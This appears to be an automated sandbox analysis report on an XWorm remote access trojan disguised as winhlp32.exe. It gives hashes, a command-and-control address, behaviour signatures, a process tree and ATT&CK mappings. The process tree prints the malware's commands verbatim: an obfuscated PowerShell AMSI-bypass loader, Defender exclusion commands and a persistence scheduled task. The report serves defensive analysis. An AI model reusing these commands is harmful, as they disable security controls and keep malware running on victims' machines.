Analysis

  • max time kernel
    30s
  • max time network
    27s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11-05-2024 09:52

General

  • Target

    winhlp32.exe

  • Size

    205KB

  • MD5

    a83dc22ef14c6b5d96aaee00b10a4973

  • SHA1

    ef84a5e12797487e7a4c1acaa9f783eda6cc77d5

  • SHA256

    143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d

  • SHA512

    0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc

  • SSDEEP

    6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd

Malware Config

Extracted

Family

xworm

Version

3.0

C2

147.185.221.18:41012

Attributes
  • Install_directory

    %AppData%

  • install_file

    Agent.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:992
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3c93cbca-c388-412d-9e86-0a98270fdb6b}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4424
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:728
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:344
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:488
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:1028
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1044
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2908
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nDUStEyOEoDE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dcocxxPjKXPMlg,[Parameter(Position=1)][Type]$tujwgjBWYM)$wLLsXGudaWF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'emo'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'yD'+'e'+'le'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+''+','+'Se'+[Char](97)+'l'+'e'+'d,'+[Char](65)+'n'+[Char](115)+''+'i'+'Cla'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$wLLsXGudaWF.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+'e'+'c'+''+'i'+''+'a'+''+'l'+'N'+'a'+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$dcocxxPjKXPMlg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+'n'+'a'+[Char](103)+''+'e'+'d');$wLLsXGudaWF.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+','+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tujwgjBWYM,$dcocxxPjKXPMlg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $wLLsXGudaWF.CreateType();}$AthxnCPlhrpvW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$LnIyJBpOVUdTEW=$AthxnCPlhrpvW.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+'roc'+'A'+'d'+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gwxcFusGicLbCZAARsj=nDUStEyOEoDE @([String])([IntPtr]);$GKiBLqkdSBMzElWfVAPIkF=nDUStEyOEoDE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cbEhRGZoqMf=$AthxnCPlhrpvW.GetMethod(''+'G'+''+'e'+'tM'+'o'+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$AovqupOiUrFImA=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$cbEhRGZoqMf,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$EqQnNaRrlFmfnMMOX=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$cbEhRGZoqMf,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$CyVEfCH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AovqupOiUrFImA,$gwxcFusGicLbCZAARsj).Invoke('am'+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$wfaMtRrcfYjkxVXdn=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$CyVEfCH,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'B'+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$MFUskHYIQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EqQnNaRrlFmfnMMOX,$GKiBLqkdSBMzElWfVAPIkF).Invoke($wfaMtRrcfYjkxVXdn,[uint32]8,4,[ref]$MFUskHYIQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wfaMtRrcfYjkxVXdn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EqQnNaRrlFmfnMMOX,$GKiBLqkdSBMzElWfVAPIkF).Invoke($wfaMtRrcfYjkxVXdn,[uint32]8,0x20,[ref]$MFUskHYIQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'x'+'4'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2080
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1120
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                        1⤵
                          PID:1244
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                          1⤵
                            PID:1260
                            • c:\windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2676
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s nsi
                              1⤵
                                PID:1284
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                1⤵
                                  PID:1308
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                  1⤵
                                    PID:1320
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                    1⤵
                                      PID:1388
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1468
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1500
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                          1⤵
                                            PID:1560
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                            1⤵
                                              PID:1568
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                                              1⤵
                                                PID:1656
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1668
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1756
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1764
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                      1⤵
                                                        PID:1904
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1948
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2032
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:1848
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2204
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                              1⤵
                                                                PID:2244
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2444
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                  1⤵
                                                                    PID:2452
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                    1⤵
                                                                      PID:2484
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2668
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                        1⤵
                                                                          PID:2704
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2732
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                            1⤵
                                                                              PID:2748
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                              1⤵
                                                                                PID:2792
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                1⤵
                                                                                  PID:2808
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2980
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3268
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3432
                                                                                        • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2772
                                                                                          • C:\Windows\System32\x4L.exe
                                                                                            "C:\Windows\System32\x4L.exe"
                                                                                            3⤵
                                                                                            • Drops startup file
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:1676
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4912
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:968
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:5048
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:4692
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:4856
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:3476
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"
                                                                                                    4⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4400
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                        PID:2164
                                                                                                  • C:\Windows\System32\x4Shellcode.exe
                                                                                                    "C:\Windows\System32\x4Shellcode.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:656
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat""
                                                                                                    3⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2508
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      4⤵
                                                                                                        PID:308
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout 3
                                                                                                        4⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:1588
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3980
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:1836
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                      1⤵
                                                                                                        PID:4920
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:4276
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                            PID:3264
                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                            1⤵
                                                                                                              PID:2832
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:4892
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:3700
                                                                                                                • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1680
                                                                                                                  • C:\Windows\System32\InstallAgent.exe
                                                                                                                    C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:1832
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                      1⤵
                                                                                                                        PID:4580
                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4768
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3256

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                          Execution

                                                                                                                          Command and Scripting Interpreter

                                                                                                                          1
                                                                                                                          T1059

                                                                                                                          PowerShell

                                                                                                                          1
                                                                                                                          T1059.001

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Persistence

                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                          1
                                                                                                                          T1547

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          1
                                                                                                                          T1547.001

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Privilege Escalation

                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                          1
                                                                                                                          T1547

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          1
                                                                                                                          T1547.001

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Defense Evasion

                                                                                                                          Modify Registry

                                                                                                                          1
                                                                                                                          T1112

                                                                                                                          Discovery

                                                                                                                          System Information Discovery

                                                                                                                          1
                                                                                                                          T1082

                                                                                                                          Query Registry

                                                                                                                          1
                                                                                                                          T1012

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                            Filesize

                                                                                                                            3KB

                                                                                                                            MD5

                                                                                                                            8592ba100a78835a6b94d5949e13dfc1

                                                                                                                            SHA1

                                                                                                                            63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                            SHA256

                                                                                                                            fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                            SHA512

                                                                                                                            87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            e17c9e56f54fd40c47e128741ffb77e3

                                                                                                                            SHA1

                                                                                                                            714e2b000c168ca9dcdf2887ccf82e4494e058cc

                                                                                                                            SHA256

                                                                                                                            b14046c78530a73a7dec1fac039d44693d5fd0fce7d6515c21fe646cd58df17c

                                                                                                                            SHA512

                                                                                                                            e58eb04c5cefe6474b7699ef2add288aba0a8127c81dfd3f4be6dad7b90f3af93a8c96f5d99dbc8df9d6b88347e892225ba0e528673d585209d773240379a37a

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            3c1a969865f69f3c4d7900237eb53edf

                                                                                                                            SHA1

                                                                                                                            7f380a06239142fb9092f67a145cb343577cd211

                                                                                                                            SHA256

                                                                                                                            f2f0972f48e2b16c38ab6faa526c6c1e0b23f2685d9db139735092ab79219b12

                                                                                                                            SHA512

                                                                                                                            aa42eefb54ab76a7773b6ff312450d2615c5bf879942f16e2bf2b3ccbb7605b21fcad095258a72571fc3399d2d9b8da04f70f9c79c776188e678dcb7d1abb932

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat
                                                                                                                            Filesize

                                                                                                                            160B

                                                                                                                            MD5

                                                                                                                            9fe35ff2c475ab06e8a218dc6a49b8fd

                                                                                                                            SHA1

                                                                                                                            9ed4f0001110869f80cd6ed9d12c2f4f620d4960

                                                                                                                            SHA256

                                                                                                                            a383268390c816e6ae53192a2f638099b16f40c444b8d6dcb5d5d180c9afca7c

                                                                                                                            SHA512

                                                                                                                            34283cfa9cd34d80b37695b3c31565e450dd4dd13bba4a44a932c5410f6c112fed572f3cfa324f6ad8c2f37e22e7237818cf8914f3bef1355acf63f7707ae169

                                                                                                                          • C:\Windows\System32\x4L.exe
                                                                                                                            Filesize

                                                                                                                            68KB

                                                                                                                            MD5

                                                                                                                            9ecdf1a7818f7e9952b6041e3aa19b7a

                                                                                                                            SHA1

                                                                                                                            93a8357036356c1c1e20a5cf69fdbad877ce8a0f

                                                                                                                            SHA256

                                                                                                                            0771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4

                                                                                                                            SHA512

                                                                                                                            847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853

                                                                                                                          • C:\Windows\System32\x4Shellcode.exe
                                                                                                                            Filesize

                                                                                                                            164KB

                                                                                                                            MD5

                                                                                                                            8a7bee2c8cec6ac50bc42fe03d3231e6

                                                                                                                            SHA1

                                                                                                                            ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d

                                                                                                                            SHA256

                                                                                                                            c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8

                                                                                                                            SHA512

                                                                                                                            34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

                                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_nqongnxe.zqu.ps1
                                                                                                                            Filesize

                                                                                                                            1B

                                                                                                                            MD5

                                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                                            SHA1

                                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                            SHA256

                                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                            SHA512

                                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                          • memory/584-63-0x00000272AB210000-0x00000272AB236000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            152KB

                                                                                                                          • memory/584-64-0x00000272AB240000-0x00000272AB26C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/584-72-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/584-71-0x00000272AB240000-0x00000272AB26C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/584-65-0x00000272AB240000-0x00000272AB26C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/640-83-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/640-76-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/640-82-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/728-94-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

